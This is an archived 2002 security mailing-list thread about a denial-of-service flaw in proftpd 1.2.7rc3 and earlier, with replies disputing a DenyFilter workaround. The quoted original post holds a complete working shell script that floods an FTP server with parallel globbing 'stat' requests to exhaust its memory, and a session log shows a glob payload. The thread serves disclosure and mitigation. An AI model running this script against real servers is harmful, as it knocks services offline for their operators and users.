[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS
1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, neither has the
default proftpd install on slackware 8.1
3. The methods mentioned on the page you refer to do not work on later
proftpd versions (tested on 1.2.7rc3) because of limits set in the
ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
these proftpd versions don't even process that command.
I think I have done proper research on this issue before notifying anyone.
People should do more research before making any conclusions, it's far
On Tue, 10 Dec 2002, Kurt Seifried wrote:
> This is so old I can't even find any postings/articles I remember making on
> it. Here is one link from early last year:
> Check the documentation:
> DenyFilter \*.*/
> Problem solved.
> People should search Google before posting, it's far less embaressing.
> Kurt Seifried, kurt@xxxxxxxxxxxx
> A15B BEE5 B391 B9AD B0EF
> AEB0 AD63 0B4E AD56 E574
> ----- Original Message -----
> From: "Rob klein Gunnewiek" <rmkleing@xxxxxxxxxx>
> To: <bugtraq@xxxxxxxxxxxxxxxxx>; <vulnwatch@xxxxxxxxxxxxx>
> Sent: Sunday, December 08, 2002 4:53 AM
> Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
> > Hello,
> > proftpd is vulnerable to denial of service similar to the list
> > */../*/../*/../*.
> > #!/bin/sh
> > #
> > # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> > # might work against many other FTP daemons
> > # consumes nearly all memory and alot of CPU
> > #
> > # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> > #
> > # 7-dec-02 - detach - www.duho.org
> > #
> > # use: ./prodos.sh <host> <user> <pass>
> > # do this some more to make sure the system eventually dies
> > cnt=25
> > while [ $cnt -gt 0 ] ; do
> > ftp -n << EOF&
> > o $1
> > quote user $2
> > quote pass $3
> > quote stat /*/*/*/*/*/*/*
> > quit
> > EOF
> > let cnt=cnt-1
> > done
> > sleep 2
> > killall -9 ftp
> > echo DONE!
> > #end